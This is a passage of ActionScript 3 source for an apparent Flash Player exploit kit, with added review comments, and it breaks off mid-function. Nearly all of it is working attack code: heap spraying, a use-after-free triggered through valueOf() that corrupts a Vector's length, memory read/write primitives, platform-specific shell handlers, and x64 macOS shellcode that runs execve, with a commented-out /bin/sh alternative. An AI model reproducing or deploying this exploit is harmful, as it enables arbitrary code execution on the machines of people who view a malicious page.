			logAdd("MyClass.valueOf()");
			
			// five fresh Vectors, kept reachable through _gc. _gc must already exist
			// (TryExpl creates it) - invoking valueOf() before TryExpl() faults here.
			_va = new Array(5);
			_gc.push(_va); // protect from GC // for RnD
			
			// reallocate _ba storage
			// (growing the ByteArray the caller is writing into; the original comment
			// below calls the old backing store "freed memory")
			_ba.length = 0x1100;
			
			// reuse freed memory
			// NOTE(review): the element type was lost when this listing was extracted
			// ("Vector." is not valid AS3); TryExpl treats the elements as 32-bit words,
			// so presumably Vector.<uint> - confirm against the original source.
			// `i` starts at 0: an AS3 int declared without an initializer is 0.
			for(var i:int; i < _va.length; i++)
				_va[i] = new Vector.(0x3f0);
			
			// return one byte for overwriting
			// (the caller's pending byte store writes this value - presumably into the
			// stale buffer now reused by one of the Vectors, which is what TryExpl
			// detects as a Vector whose length is no longer 0x3f0)
			return 0x40;
		}
 45 | 		
 46 | 		// try to corrupt the length value of Vector.
		// One exploitation attempt.  Sprays [MyClass2][ByteArray][MyClass2] triples,
		// then stores a MyClass into each ByteArray so MyClass.valueOf() runs in the
		// middle of the store, reallocating the ByteArray under a Vector spray.  A
		// Vector whose length is no longer 0x3f0 is the corrupted one; it is handed to
		// the platform Shell* helper together with the neighbouring MyClass2.
		// Returns true once a Shell*.Init() path was reached, false on any failure;
		// the reason is only visible in the log.  Layout- and order-dependent: do not
		// reorder statements or allocations.
		static function TryExpl() : Boolean
		{
			try
			{
				var alen:int = 90; // should be multiply of 3
				var a = new Array(alen);
				if (_gc == null) _gc = new Array();
				_gc.push(a); // protect from GC // for RnD
				
				// try to allocate two sequential pages of memory: [ ByteArray ][ MyClass2 ]
				// (a[i] and a[i+2] are MyClass2, a[i+1] is a 0xfa0-byte ByteArray)
				for(var i:int; i < alen; i+=3){
					a[i] = new MyClass2(i);
					
					a[i+1] = new ByteArray();
					a[i+1].length = 0xfa0;
					
					a[i+2] = new MyClass2(i+2);
				}
				
				// find these pages
				// NOTE(review): the element type was lost when this listing was extracted
				// ("Vector." is not valid AS3); the code below compares elements with
				// 32-bit constants and masks them with 0xfffff000, so presumably
				// Vector.<uint> - confirm against the original source / exp1.fla.
				var v:Vector.;
				// walk the ByteArrays (indices 1 mod 3: 85, 82, ... 1) from the top down
				for(i=alen-5; i >= 0; i-=3)
				{
					// take next allocated ByteArray
					_ba = a[i];
					// call valueOf() and cause UaF memory corruption 
					// (the store coerces the object via MyClass.valueOf(), which grows
					// _ba and sprays _va before the byte is written)
					_ba[3] = new MyClass();
					// _ba[3] should be unchanged 0
					logAdd("_ba[3] = " + _ba[3]);
					if (_ba[3] != 0) throw new Error("can't cause UaF");
					
					// check results // find corrupted vector
					for(var j:int=0; j < _va.length; j++){
						v = _va[j];
						if (v.length != 0x3f0) {
							logAdd("v.length = 0x" + v.length.toString(16));
							
							// check the [ MyClass2 ] presence after [ ByteArray ]
							// (0x11223344 is presumably the marker MyClass2 fills its padding
							// fields with - its constructor is not in this listing; confirm)
							var k:int = 0x400 + 70;
							if (v[k] == 0x11223344) {
								// ok, scroll k to mc.a0
								do k-- while (v[k] == 0x11223344);
								// v[k] is used as an index back into the spray array, so a0
								// presumably holds the index passed to the MyClass2 constructor
								var mc:MyClass2 = a[v[k]];
								mc.length = 0x123;
								
								//logAdd("k = " + (k - 0x400) + ", mc = " + MyUtils.ToStringV(v, 0x400, 64));
								
								//check for x64 and proceed to payload execution
								// (the distance from the page start to a0 is used as the 32/64-bit
								// discriminator; threshold 40 is an empirical layout constant)
								if ((k - 0x400) > 40) {
									if (MyUtils.isWin()) {
										if (ShellWin64.Init(v, 0x1000, mc, k-8)) ShellWin64.Exec() else logAdd("Fail.");
									}else
									if (MyUtils.isMac()) {
										if (ShellMac64.Init(v, 0x1000, mc, k-8)) ShellMac64.Exec() else logAdd("Fail.");
									}else
										logAdd("todo: unsupported x64 os");
								} else {
									if (MyUtils.isWin()) {
										if (ShellWin32.Init(v, (v[k-4] & 0xfffff000) - 0x1000 + 8, mc, k-4)) ShellWin32.Exec() else logAdd("Fail.");
									}else
										logAdd("todo: unsupported x86 os");
								}
								
								logAdd("v.length = 0x" + v.length.toString(16));
								// NOTE(review): true is returned even when Init() returned false or
								// the OS was unsupported; only the "Fail." / "todo:" log lines tell.
								return true;
							}
							
							logAdd("bad MyClass2 allocation.");
							break;
						}
					}
				}
				
				logAdd("bad allocation. try again.");
			}
			catch (e:Error) 
			{
				logAdd("TryExpl() " + e.toString());
			}
			
			return false;
		}
129 | 		
130 | 		// 
131 | 		static function btnClickHandler(e:MouseEvent):void 
132 | 		{
133 | 			try
134 | 			{	
135 | 				logAdd("===== start =====");
136 | 				
137 | 				// try to exploit
138 | 				TryExpl();
139 | 				
140 | 				logAdd("=====  end  =====");
141 | 			}
142 | 			catch (e:Error) 
143 | 			{
144 | 				logAdd(e.toString());
145 | 			}
146 | 		}
147 | 		
148 | 		// init GUI elements
149 | 		static public function InitGui(doc: DisplayObjectContainer)
150 | 		{
151 | 			try
152 | 			{
153 | 				// add text area
154 | 				_log = new TextArea(); 
155 | 				_log.move(20,2);
156 | 				_log.setSize(560, 360); 
157 | 				_log.condenseWhite = true; 
158 | 				_log.editable = false;
159 | 				doc.addChild(_log);
160 | 				
161 | 				// add the button
162 | 				var btn:Button = new Button();
163 | 				btn.label = "Run" + (MyUtils.isWin() ? " calc.exe":"");
164 | 				btn.move(220, 370);
165 | 				btn.setSize(160,26);
166 | 				btn.addEventListener(MouseEvent.CLICK, btnClickHandler);
167 | 				doc.addChild(btn);
168 | 			
169 | 				// print environment info
170 | 				logAdd("Flash: " + Capabilities.version + (Capabilities.isDebugger ? " Debug":"")
171 | 						+ " " + Capabilities.cpuArchitecture + (is32() ? "-32" : is64() ? "-64":"") + " " + Capabilities.playerType);
172 | 				logAdd("OS: " + Capabilities.os  + (Capabilities.supports64BitProcesses ? " 64-bit":" 32-bit"));
173 | 			
174 | 				if (ExternalInterface.available)
175 | 					logAdd("Browser: " + callJS("getEnvInfo"));
176 | 			}
177 | 			catch (e:Error) 
178 | 			{
179 | 				logAdd("InitGui() " + e.toString());
180 | 			}
181 | 		}
182 | 		
183 | 		// calls JavaScript function
184 | 		static function callJS(func:String):String 
185 | 		{
186 | 			try
187 | 			{
188 | 				if (ExternalInterface.available)
189 | 					return "" + ExternalInterface.call(func);
190 | 			}
191 | 			catch (e:Error) 
192 | 			{
193 | 			}
194 | 			return "";
195 | 		}
196 | 		
197 | 		// checks for x32/x64 platform
		static var _platform:String; // lazily cached callJS("getPlatform") result shared by is32()/is64()
199 | 		
200 | 		static function is32():Boolean
201 | 		{
202 | 			var x64:Boolean = Capabilities.supports64BitProcesses;
203 | 			if (x64 && MyUtils.isWin()) {
204 | 				// FP can be 32-bit on Windows x64
205 | 				if (_platform == null) _platform = callJS("getPlatform");
206 | 				return _platform.search("32") >= 0;
207 | 			}
208 | 			return !x64;
209 | 		}
210 | 		
211 | 		static function is64():Boolean
212 | 		{
213 | 			var x64:Boolean = Capabilities.supports64BitProcesses;
214 | 			if (x64 && MyUtils.isWin()) {
215 | 				// FP can be 32-bit on Windows x64
216 | 				if (_platform == null) _platform = callJS("getPlatform");
217 | 				return _platform.search("64") >= 0;
218 | 			}
219 | 			return x64;
220 | 		}
221 | 	}
222 | 
223 | }


--------------------------------------------------------------------------------
/flash0day/exp1/MyClass1.as:
--------------------------------------------------------------------------------
1 | package
2 | {
3 | 	import flash.utils.ByteArray;
4 | 	
	// ByteArray carrying four extra object-reference slots.  Nothing in MyClass
	// reads o1..o4; MyClass2 extends this class and pads itself further with uint
	// fields "to enlarge the MyClass2 size", so these slots presumably exist only to
	// fix the object's size/field layout for the heap grooming in MyClass.TryExpl().
	// NOTE(review): confirm against the Shell* helpers before adding or removing fields.
	class MyClass1 extends ByteArray
	{
		var o1:Object, o2:Object, o3:Object, o4:Object;
	}	
9 | }


--------------------------------------------------------------------------------
/flash0day/exp1/MyClass2.as:
--------------------------------------------------------------------------------
  1 | package
  2 | {
  3 | 	class MyClass2 extends MyClass1
  4 | 	{
  5 | 		var					
  6 | 			// enlarge the MyClass2 size by dummy attributes
  7 | 			a0 :uint, a1 :uint, a2 :uint, a3 :uint, a4 :uint, a5 :uint, a6 :uint, a7 :uint, a8 :uint, a9 :uint, 
  8 | 			a10:uint, a11:uint, a12:uint, a13:uint, a14:uint, a15:uint, a16:uint, a17:uint, a18:uint, a19:uint,
  9 | 			a20:uint, a21:uint, a22:uint, a23:uint, a24:uint, a25:uint, a26:uint, a27:uint, a28:uint, a29:uint, 
 10 | 			a30:uint, a31:uint, a32:uint, a33:uint, a34:uint, a35:uint, a36:uint, a37:uint, a38:uint, a39:uint, 
 11 | 			a40:uint, a41:uint, a42:uint, a43:uint, a44:uint, a45:uint, a46:uint, a47:uint, a48:uint, a49:uint, 
 12 | 			a50:uint, a51:uint, a52:uint, a53:uint, a54:uint, a55:uint, a56:uint, a57:uint, a58:uint, a59:uint, 
 13 | 			a60:uint, a61:uint, a62:uint, a63:uint, a64:uint, a65:uint, a66:uint, a67:uint, a68:uint, a69:uint, 
 14 | 			a70:uint, a71:uint, a72:uint, a73:uint, a74:uint, a75:uint, a76:uint, a77:uint, a78:uint, a79:uint, 
 15 | 			a80:uint, a81:uint, a82:uint, a83:uint, a84:uint, a85:uint, a86:uint, a87:uint, a88:uint, a89:uint, 
 16 | 			a90:uint, a91:uint, a92:uint, a93:uint, a94:uint, a95:uint, a96:uint, a97:uint, a98:uint, a99:uint,
 17 | 			
 18 | 			a100:uint, a101:uint, a102:uint, a103:uint, a104:uint, a105:uint, a106:uint, a107:uint, a108:uint, a109:uint,
 19 | 			a110:uint, a111:uint, a112:uint, a113:uint, a114:uint, a115:uint, a116:uint, a117:uint, a118:uint, a119:uint,
 20 | 			a120:uint, a121:uint, a122:uint, a123:uint, a124:uint, a125:uint, a126:uint, a127:uint, a128:uint, a129:uint,
 21 | 			a130:uint, a131:uint, a132:uint, a133:uint, a134:uint, a135:uint, a136:uint, a137:uint, a138:uint, a139:uint,
 22 | 			a140:uint, a141:uint, a142:uint, a143:uint, a144:uint, a145:uint, a146:uint, a147:uint, a148:uint, a149:uint,
 23 | 			a150:uint, a151:uint, a152:uint, a153:uint, a154:uint, a155:uint, a156:uint, a157:uint, a158:uint, a159:uint,
 24 | 			a160:uint, a161:uint, a162:uint, a163:uint, a164:uint, a165:uint, a166:uint, a167:uint, a168:uint, a169:uint,
 25 | 			a170:uint, a171:uint, a172:uint, a173:uint, a174:uint, a175:uint, a176:uint, a177:uint, a178:uint, a179:uint,
 26 | 			a180:uint, a181:uint, a182:uint, a183:uint, a184:uint, a185:uint, a186:uint, a187:uint, a188:uint, a189:uint,
 27 | 			a190:uint, a191:uint, a192:uint, a193:uint, a194:uint, a195:uint, a196:uint, a197:uint, a198:uint, a199:uint,
 28 | 
 29 | 			a200:uint, a201:uint, a202:uint, a203:uint, a204:uint, a205:uint, a206:uint, a207:uint, a208:uint, a209:uint,
 30 | 			a210:uint, a211:uint, a212:uint, a213:uint, a214:uint, a215:uint, a216:uint, a217:uint, a218:uint, a219:uint,
 31 | 			a220:uint, a221:uint, a222:uint, a223:uint, a224:uint, a225:uint, a226:uint, a227:uint, a228:uint, a229:uint, 
 32 | 			a230:uint, a231:uint, a232:uint, a233:uint, a234:uint, a235:uint, a236:uint, a237:uint, a238:uint, a239:uint,
 33 | 			a240:uint, a241:uint, a242:uint, a243:uint, a244:uint, a245:uint, a246:uint, a247:uint, a248:uint, a249:uint,
 34 | 			a250:uint, a251:uint, a252:uint, a253:uint, a254:uint, a255:uint, a256:uint, a257:uint, a258:uint, a259:uint,
 35 | 			a260:uint, a261:uint, a262:uint, a263:uint, a264:uint, a265:uint, a266:uint, a267:uint, a268:uint, a269:uint,
 36 | 			a270:uint, a271:uint, a272:uint, a273:uint, a274:uint, a275:uint, a276:uint, a277:uint, a278:uint, a279:uint,
 37 | 			a280:uint, a281:uint, a282:uint, a283:uint, a284:uint, a285:uint, a286:uint, a287:uint, a288:uint, a289:uint,
 38 | 			a290:uint, a291:uint, a292:uint, a293:uint, a294:uint, a295:uint, a296:uint, a297:uint, a298:uint, a299:uint,
 39 | 
 40 | 			a300:uint, a301:uint, a302:uint, a303:uint, a304:uint, a305:uint, a306:uint, a307:uint, a308:uint, a309:uint,
 41 | 			a310:uint, a311:uint, a312:uint, a313:uint, a314:uint, a315:uint, a316:uint, a317:uint, a318:uint, a319:uint,
 42 | 			a320:uint, a321:uint, a322:uint, a323:uint, a324:uint, a325:uint, a326:uint, a327:uint, a328:uint, a329:uint, 
 43 | 			a330:uint, a331:uint, a332:uint, a333:uint, a334:uint, a335:uint, a336:uint, a337:uint, a338:uint, a339:uint,
 44 | 			a340:uint, a341:uint, a342:uint, a343:uint, a344:uint, a345:uint, a346:uint, a347:uint, a348:uint, a349:uint,
 45 | 			a350:uint, a351:uint, a352:uint, a353:uint, a354:uint, a355:uint, a356:uint, a357:uint, a358:uint, a359:uint,
 46 | 			a360:uint, a361:uint, a362:uint, a363:uint, a364:uint, a365:uint, a366:uint, a367:uint, a368:uint, a369:uint,
 47 | 			a370:uint, a371:uint, a372:uint, a373:uint, a374:uint, a375:uint, a376:uint, a377:uint, a378:uint, a379:uint,
 48 | 			a380:uint, a381:uint, a382:uint, a383:uint, a384:uint, a385:uint, a386:uint, a387:uint, a388:uint, a389:uint,
 49 | 			a390:uint, a391:uint, a392:uint, a393:uint, a394:uint, a395:uint, a396:uint, a397:uint, a398:uint, a399:uint,
 50 | 
 51 | 			a400:uint, a401:uint, a402:uint, a403:uint, a404:uint, a405:uint, a406:uint, a407:uint, a408:uint, a409:uint,
 52 | 			a410:uint, a411:uint, a412:uint, a413:uint, a414:uint, a415:uint, a416:uint, a417:uint, a418:uint, a419:uint,
 53 | 			a420:uint, a421:uint, a422:uint, a423:uint, a424:uint, a425:uint, a426:uint, a427:uint, a428:uint, a429:uint,
 54 | 			a430:uint, a431:uint, a432:uint, a433:uint, a434:uint, a435:uint, a436:uint, a437:uint, a438:uint, a439:uint,
 55 | 			a440:uint, a441:uint, a442:uint, a443:uint, a444:uint, a445:uint, a446:uint, a447:uint, a448:uint, a449:uint,
 56 | 			a450:uint, a451:uint, a452:uint, a453:uint, a454:uint, a455:uint, a456:uint, a457:uint, a458:uint, a459:uint,
 57 | 			a460:uint, a461:uint, a462:uint, a463:uint, a464:uint, a465:uint, a466:uint, a467:uint, a468:uint, a469:uint,
 58 | 			a470:uint, a471:uint, a472:uint, a473:uint, a474:uint, a475:uint, a476:uint, a477:uint, a478:uint, a479:uint,
 59 | 			a480:uint, a481:uint, a482:uint, a483:uint, a484:uint, a485:uint, a486:uint, a487:uint, a488:uint, a489:uint,
 60 | 			a490:uint, a491:uint, a492:uint, a493:uint, a494:uint, a495:uint, a496:uint, a497:uint, a498:uint, a499:uint,
 61 | 			
 62 | 			a500:uint, a501:uint, a502:uint, a503:uint, a504:uint, a505:uint, a506:uint, a507:uint, a508:uint, a509:uint,
 63 | 			a510:uint, a511:uint, a512:uint, a513:uint, a514:uint, a515:uint, a516:uint, a517:uint, a518:uint, a519:uint,
 64 | 			a520:uint, a521:uint, a522:uint, a523:uint, a524:uint, a525:uint, a526:uint, a527:uint, a528:uint, a529:uint,
 65 | 			a530:uint, a531:uint, a532:uint, a533:uint, a534:uint, a535:uint, a536:uint, a537:uint, a538:uint, a539:uint,
 66 | 			a540:uint, a541:uint, a542:uint, a543:uint, a544:uint, a545:uint, a546:uint, a547:uint, a548:uint, a549:uint,
 67 | 			a550:uint, a551:uint, a552:uint, a553:uint, a554:uint, a555:uint, a556:uint, a557:uint, a558:uint, a559:uint,
 68 | 			a560:uint, a561:uint, a562:uint, a563:uint, a564:uint, a565:uint, a566:uint, a567:uint, a568:uint, a569:uint,
 69 | 			a570:uint, a571:uint, a572:uint, a573:uint, a574:uint, a575:uint, a576:uint, a577:uint, a578:uint, a579:uint,
 70 | 			a580:uint, a581:uint, a582:uint, a583:uint, a584:uint, a585:uint, a586:uint, a587:uint, a588:uint, a589:uint,
 71 | 			a590:uint, a591:uint, a592:uint, a593:uint, a594:uint, a595:uint, a596:uint, a597:uint, a598:uint, a599:uint,
 72 | 			
 73 | 			a600:uint, a601:uint, a602:uint, a603:uint, a604:uint, a605:uint, a606:uint, a607:uint, a608:uint, a609:uint,
 74 | 			a610:uint, a611:uint, a612:uint, a613:uint, a614:uint, a615:uint, a616:uint, a617:uint, a618:uint, a619:uint,
 75 | 			a620:uint, a621:uint, a622:uint, a623:uint, a624:uint, a625:uint, a626:uint, a627:uint, a628:uint, a629:uint,
 76 | 			a630:uint, a631:uint, a632:uint, a633:uint, a634:uint, a635:uint, a636:uint, a637:uint, a638:uint, a639:uint,
 77 | 			a640:uint, a641:uint, a642:uint, a643:uint, a644:uint, a645:uint, a646:uint, a647:uint, a648:uint, a649:uint,
 78 | 			a650:uint, a651:uint, a652:uint, a653:uint, a654:uint, a655:uint, a656:uint, a657:uint, a658:uint, a659:uint,
 79 | 			a660:uint, a661:uint, a662:uint, a663:uint, a664:uint, a665:uint, a666:uint, a667:uint, a668:uint, a669:uint,
 80 | 			a670:uint, a671:uint, a672:uint, a673:uint, a674:uint, a675:uint, a676:uint, a677:uint, a678:uint, a679:uint,
 81 | 			a680:uint, a681:uint, a682:uint, a683:uint, a684:uint, a685:uint, a686:uint, a687:uint, a688:uint, a689:uint,
 82 | 			a690:uint, a691:uint, a692:uint, a693:uint, a694:uint, a695:uint, a696:uint, a697:uint, a698:uint, a699:uint,
 83 | 			
 84 | 			a700:uint, a701:uint, a702:uint, a703:uint, a704:uint, a705:uint, a706:uint, a707:uint, a708:uint, a709:uint,
 85 | 			a710:uint, a711:uint, a712:uint, a713:uint, a714:uint, a715:uint, a716:uint, a717:uint, a718:uint, a719:uint,
 86 | 			a720:uint, a721:uint, a722:uint, a723:uint, a724:uint, a725:uint, a726:uint, a727:uint, a728:uint, a729:uint,
 87 | 			a730:uint, a731:uint, a732:uint, a733:uint, a734:uint, a735:uint, a736:uint, a737:uint, a738:uint, a739:uint,
 88 | 			a740:uint, a741:uint, a742:uint, a743:uint, a744:uint, a745:uint, a746:uint, a747:uint, a748:uint, a749:uint,
 89 | 			a750:uint, a751:uint, a752:uint, a753:uint, a754:uint, a755:uint, a756:uint, a757:uint, a758:uint, a759:uint,
 90 | 			a760:uint, a761:uint, a762:uint, a763:uint, a764:uint, a765:uint, a766:uint, a767:uint, a768:uint, a769:uint,
 91 | 			a770:uint, a771:uint, a772:uint, a773:uint, a774:uint, a775:uint, a776:uint, a777:uint, a778:uint, a779:uint,
 92 | 			a780:uint, a781:uint, a782:uint, a783:uint, a784:uint, a785:uint, a786:uint, a787:uint, a788:uint, a789:uint,
 93 | 			a790:uint, a791:uint, a792:uint, a793:uint, a794:uint, a795:uint, a796:uint, a797:uint, a798:uint, a799:uint,
 94 | 			
 95 | 			a800:uint, a801:uint, a802:uint, a803:uint, a804:uint, a805:uint, a806:uint, a807:uint, a808:uint, a809:uint,
 96 | 			a810:uint, a811:uint, a812:uint, a813:uint, a814:uint, a815:uint, a816:uint, a817:uint, a818:uint, a819:uint,
 97 | 			a820:uint, a821:uint, a822:uint, a823:uint, a824:uint, a825:uint, a826:uint, a827:uint, a828:uint, a829:uint,
 98 | 			a830:uint, a831:uint, a832:uint, a833:uint, a834:uint, a835:uint, a836:uint, a837:uint, a838:uint, a839:uint,
 99 | 			a840:uint, a841:uint, a842:uint, a843:uint, a844:uint, a845:uint, a846:uint, a847:uint, a848:uint, a849:uint,
100 | 			a850:uint, a851:uint, a852:uint, a853:uint, a854:uint, a855:uint, a856:uint, a857:uint, a858:uint, a859:uint,
101 | 			a860:uint, a861:uint, a862:uint, a863:uint, a864:uint, a865:uint, a866:uint, a867:uint, a868:uint, a869:uint,
102 | 			a870:uint, a871:uint, a872:uint, a873:uint, a874:uint, a875:uint, a876:uint, a877:uint, a878:uint, a879:uint,
103 | 			a880:uint, a881:uint, a882:uint, a883:uint, a884:uint, a885:uint, a886:uint, a887:uint, a888:uint, a889:uint,
104 | 			a890:uint, a891:uint, a892:uint, a893:uint, a894:uint, a895:uint, a896:uint, a897:uint, a898:uint, a899:uint
105 | 			
106 | 			
107 | 		// constructor
108 | 		function MyClass2(id:int)
109 | 		{
110 | 			o1 = this; 
111 | 			a0 = id;
112 | 			for(var i:int=1; i < 64; i++) this["a"+i] = 0x11223344;
113 | 		}
114 | 	}	
115 | }


--------------------------------------------------------------------------------
/flash0day/exp1/MyUtils.as:
--------------------------------------------------------------------------------
 1 | package
 2 | {
 3 | 	import flash.utils.*;
 4 | 	import flash.system.Capabilities;
 5 | 
 6 | 	class MyUtils 
 7 | 	{
 8 | 		static var _bArr:ByteArray;
 9 | 		
10 | 		// converts Vector. to ByteArray
11 | 		static function ToByteArray(v:Vector., offs:uint, len:uint):ByteArray
12 | 		{
13 | 			if (_bArr == null) _bArr = new ByteArray();
14 | 			_bArr.length = len*4;
15 | 			_bArr.position = 0;
16 | 			_bArr.endian = Endian.LITTLE_ENDIAN;
17 | 			
18 | 			len += offs;
19 | 			for(; offs < len; offs++) _bArr.writeUnsignedInt(v[offs]);
20 | 			
21 | 			return _bArr;
22 | 		}		
23 | 		
24 | 		static function ToUintVector(a:Array)
25 | 		{
26 | 			var len:uint = a.length;
27 | 			var v:Vector. = new Vector.((len >>> 2) + (len % 4 ? 1:0));
28 | 			if (len > 1) {
29 | 				len--;
30 | 				for(var i:uint=0; i <= len; i++){		
31 | 					v[i >>> 2] += uint(a[i]) << ((i%4)*8);		
32 | 				}
33 | 			}else{
34 | 				if (len) v[0] = a[0];
35 | 			}
36 | 			return v;
37 | 		}
38 | 		
		// Case-insensitive prefix compare of the bytes behind v against s.
		// v is serialised (little-endian) into the shared _bArr, the read cursor
		// is placed at offs, and s.length bytes are read as UTF-8 and upper-cased,
		// so s itself must already be upper-case ("KERNEL32.DLL",
		// "VIRTUALPROTECT" in the callers).
		// Side effect: _bArr is left positioned just past the compared bytes —
		// FindVP() relies on that to read the terminating NUL via
		// MyUtils._bArr.readByte() right after a successful match.
		// NOTE(review): the loop below inspects absolute bytes 2, 1, 0 of the
		// buffer (not offs-relative) and, at the first zero byte, moves the
		// cursor to just after it plus offs. With offs = 2 (presumably the
		// 2-byte hint that precedes the name in the import-by-name entry the
		// callers pass) a hint byte that happens to be zero therefore pushes the
		// cursor into the name and the compare fails. It reads like an attempt
		// to skip leading NULs; confirm the intent before reusing this helper —
		// a plain `position = offs` is what both call sites appear to expect.
		static function IsEqual(v:Vector., s:String, offs:uint = 0):Boolean
		{
			_bArr = ToByteArray(v, 0, v.length);
			_bArr.position = offs;
			// scan bytes 2..0 for a NUL and re-anchor the cursor after it (see note)
			for(var i:int=2; i >= 0; i--)
				if (_bArr[i] == 0) { _bArr.position = i+1 + offs; break; }

			return _bArr.readUTFBytes(s.length).toUpperCase() == s;
		}
49 | 		
50 | 		//
51 | 		static function ToStringV(v:Vector., offs:uint, len:uint):String
52 | 		{
53 | 			var str:String = "", c:int;
54 | 			
55 | 			len += offs;
56 | 			for(; offs < len; offs++, c++) {
57 | 				str += v[offs].toString(16) + ",";
58 | 				if (c == 7) { str += "
"; c = -1; } 59 | } 60 | 61 | return str; 62 | } 63 | 64 | static function isWin():Boolean 65 | { 66 | return Capabilities.version.toUpperCase().search("WIN") >= 0; 67 | } 68 | 69 | static function isMac():Boolean 70 | { 71 | return Capabilities.version.toUpperCase().search("MAC") >= 0; 72 | } 73 | } 74 | } -------------------------------------------------------------------------------- /flash0day/exp1/ShellMac64.as: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.utils.ByteArray; 4 | import flash.utils.Endian; 5 | import flash.system.Capabilities; 6 | 7 | class ShellMac64 extends MyClass 8 | { 9 | static var 10 | _v:Vector., // uint vector with corrupted length 11 | _vAddr:Number, // _v[0] address 12 | _base:Number, 13 | _baseMax:Number, 14 | _baseOld:Number, 15 | _mc:MyClass2, // descendant of ByteArray allocated right after _v[] 16 | _mcOffs:uint, // index of mc.o1 within _v[] 17 | N32:Number = Math.pow(2,32), 18 | 19 | // x64 shellcode 20 | _x64:Vector. 
= MyUtils.ToUintVector([ 21 | // "calculator" payload 22 | 0x90,0x90,0x90,0x90, // nops, just in case for alignment 23 | 0x56,0x57, // push rsi; push edi 24 | 0x48,0x31,0xc0, // xor rax, rax 25 | 0x50, // push rax 26 | 0x48,0x89,0xe6, // mov rsi, rsp // local var = 0 27 | 28 | 0x48,0xb8,0x42,0,0,2,0,0,0,0, // mov rax, 0x2000042 29 | 0x0f,0x05, // syscall vfork() 30 | 0x83,0xf8,1, // cmp eax,1 31 | 0x74,0x69, // je @@end // sandbox denied vfork() 32 | 0x48,0x83,0x3e,0x00, // cmp [rsi],0 33 | 0x75,0x63, // jne @@end // if (var != 0) skip execve() for parent process 34 | 35 | 0x48,0xb8,0x3b,0,0,2,0,0,0,0, // mov rax, 0x200003b 36 | 0x48,0x89,0x06, // mov [rsi], rax // set var != 0 37 | 0xe8,0x37,0,0,0, // call +55 // push string address 38 | // db '/Applications/Calculator.app/Contents/MacOS/Calculator' 39 | 0x2F,0x41,0x70,0x70,0x6C,0x69,0x63,0x61,0x74,0x69,0x6F,0x6E,0x73,0x2F,0x43,0x61,0x6C,0x63, 40 | 0x75,0x6C,0x61,0x74,0x6F,0x72,0x2E,0x61,0x70,0x70,0x2F,0x43,0x6F,0x6E,0x74,0x65,0x6E,0x74, 41 | 0x73,0x2F,0x4D,0x61,0x63,0x4F,0x53,0x2F,0x43,0x61,0x6C,0x63,0x75,0x6C,0x61,0x74,0x6F,0x72,0x00, 42 | //0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00, // db '/bin/sh' // update @@end offset too !!! 
43 | 0x5f, // pop rdi // pop string address into rdi 44 | 0x48,0x31,0xd2, // xor rdx, rdx 45 | 0x52, // push rdx 46 | 0x57, // push rdi 47 | 0x48,0x89,0xe6, // mov rsi, rsp 48 | 0x0f,0x05, // syscall execve() 49 | 0x48,0xb8,1,0,0,2,0,0,0,0, // mov rax, 0x2000001 50 | 0x48,0x31,0xff, // xor rdi,rdi 51 | 0x0f,0x05, // syscall exit // exit child process if execve() failed 52 | 53 | // @@end 54 | //0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 55 | //0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 56 | 0x5e, // pop rsi // restore esp 57 | 58 | /* 59 | // "empty" payload 60 | 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 61 | 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 62 | 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 63 | 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 0x90,0x90,0x90,0x90, 64 | // returns 12345678 65 | //0x48,0xB8,0x4E,0x61,0xBC,0,0,0,0,0, // mov rax, 0xBC614E 66 | 0xC3 // ret 67 | */ 68 | 69 | 0x48,0xC1,0xE0,0x03, // shl rax,3; 70 | 0x48,0x83,0xC0,0x06, // add rax,6; // set rax to AS3 int atom 71 | 0x5f,0x5e, // pop edi; pop rsi 72 | 0xC3 // ret 73 | ]); 74 | 75 | // converts two uints to hex string 76 | static function Hex(n:Number):String 77 | { 78 | if (n >= 0 && n <= 9) return n.toString() 79 | else return "0x" + n.toString(16); 80 | } 81 | 82 | // init global vars 83 | static function Init(v:Vector., offs:uint, mc:MyClass2, mcOffs:uint):Boolean 84 | { 85 | _v = v; _mc = mc; _mcOffs = mcOffs; 86 | 87 | _vAddr = Get64(mcOffs, 0xfffff000) - offs + 0x10; 88 | _baseOld = Get64(mcOffs-8); 89 | logAdd("v[0] address = " + Hex(_vAddr)); 90 | logAdd("mc old base = " + Hex(_baseOld)); 91 | 92 | // prepare new base for mc 93 | v[6] = 0xffffffff; // ByteArray::capacity 94 | v[7] = 0xfffffffe; // ByteArray::length 95 | mc.endian = Endian.LITTLE_ENDIAN; 96 | 
97 | // set new base 98 | Set64(mcOffs-8, _vAddr); 99 | _base = 0; 100 | _baseMax = 0xfffffff0; 101 | 102 | // check results 103 | var len:uint = mc.length; 104 | logAdd("mc.length = " + Hex(len)); 105 | return len == v[7]; 106 | } 107 | 108 | // restores corrupted memory 109 | static function CleanUp() 110 | { 111 | // restore _v.length 112 | Set32(_vAddr - 0x10, 0x3f0); 113 | 114 | _v[6] = 0; // _mc.capacity 115 | _v[7] = 0; // _mc.length 116 | } 117 | 118 | // join two uints as uint64 119 | static function Num(low:uint, hi:uint):Number 120 | { 121 | var n:Number = hi; 122 | if (n != 0) n *= N32; 123 | n += low; 124 | return n; 125 | } 126 | 127 | // get high uint from uint64 128 | static function Hi(n:Number):uint 129 | { 130 | return uint(Math.floor(n / N32) & (N32-1)); 131 | } 132 | 133 | // get low uint from uint64 134 | static function Low(n:Number):uint 135 | { 136 | return uint(n & (N32-1)); 137 | } 138 | 139 | // reads uint64 from _v[] 140 | static function Get64(offs:uint, mask:uint = 0xffffffff):Number 141 | { 142 | return Num(_v[offs] & mask, _v[offs+1]); 143 | } 144 | 145 | // writes uint64 into _v[] 146 | static function Set64(offs:uint, n:Number) 147 | { 148 | _v[offs] = Low(n); 149 | _v[offs+1] = Hi(n); 150 | } 151 | 152 | // sets new address pointer for _mc[0] 153 | static function 